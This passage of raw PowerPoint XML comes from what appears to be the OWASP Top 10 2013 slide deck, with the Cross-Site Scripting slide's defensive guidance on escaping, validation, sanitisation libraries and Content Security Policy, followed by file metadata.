            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>including that input in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the output page. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Without proper output escaping or validation, such input will be treated as active content in the browser. If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ajax is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>being used to dynamically update the page, are you using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>safe JavaScript APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>? For unsafe JavaScript APIs, encoding or validation must also be used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, making automated detection difficult. Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web 2.0 technologies, such as Ajax, make XSS much more difficult to detect via automated tools.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7"/>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XSS Prevention Cheat Sheet</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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP DOM based XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"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Cross-Site Scripting Article</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t> </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ESAPI Encoder API</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ASVS: Output Encoding/Escaping Requirements (V6)</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OWASP AntiSamy: Sanitization Library</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Testing Guide: 1st 3 Chapters on Data Validation Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1"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5"/>
              </a:rPr>
              <a:t>OWASP Code Review Guide: Chapter on XSS Review</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>OWASP XSS Filter Evasion Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"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7"/>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7"/>
              </a:rPr>
              <a:t>CWE Entry 79 on Cross-Site Scripting</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XSS?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XSS requires separation of untrusted data from active browser content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for details on the required data escaping techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Positive or “whitelist” input validation is also recommended as it helps protect against XSS, but is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not a complete defense </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For rich content, consider auto-sanitization libraries like OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>AntiSamy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>Java HTML Sanitizer Project</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Consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>Content Security Policy (CSP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to defend against XSS across your entire site.</a:t>
            </a:r>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A3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Scripting (XSS)</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xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/19/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3/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/03/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="06/24/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="Aspect Mod">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3A6331"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="8DC1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65300</TotalTime>
  <Words>7766</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1035</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About OWASP</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Release Notes</vt:lpstr>
      <vt:lpstr>Application Security Risks</vt:lpstr>
      <vt:lpstr>OWASP Top 10 Application Security Risks – 2013 </vt:lpstr>
      <vt:lpstr>Injection</vt:lpstr>
      <vt:lpstr>Broken Authentication and Session Management</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Insecure Direct Object References</vt:lpstr>
      <vt:lpstr>Security Misconfiguration</vt:lpstr>
      <vt:lpstr>Sensitive Data Exposure</vt:lpstr>
      <vt:lpstr>Missing Function Level Access Control</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Using Components with Known Vulnerabilities</vt:lpstr>
      <vt:lpstr>Unvalidated Redirects and Forwards</vt:lpstr>
      <vt:lpstr>What’s Next for Developers</vt:lpstr>
      <vt:lpstr>What’s Next for Verifiers</vt:lpstr>
      <vt:lpstr>What’s Next for Organizations</vt:lpstr>
      <vt:lpstr>Note About Risks</vt:lpstr>
      <vt:lpstr>Details About Risk Factors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10 - 2013</dc:title>
  <dc:subject>The Top 10 Most Critical Web Application Security Risks</dc:subject>
  <dc:creator>Dave Wichers</dc:creator>
  <cp:keywords>Web Application Security, Top 10, XSS, CSRF, SQL Injection</cp:keywords>
  <cp:lastModifiedBy>Dave Wichers</cp:lastModifiedBy>
  <cp:revision>921</cp:revision>
  <cp:lastPrinted>2013-02-06T21:03:34Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-08-31T13:33:31Z</dcterms:modified>
  <cp:contentStatus>FINAL</cp:contentStatus>
</cp:coreProperties>
</file>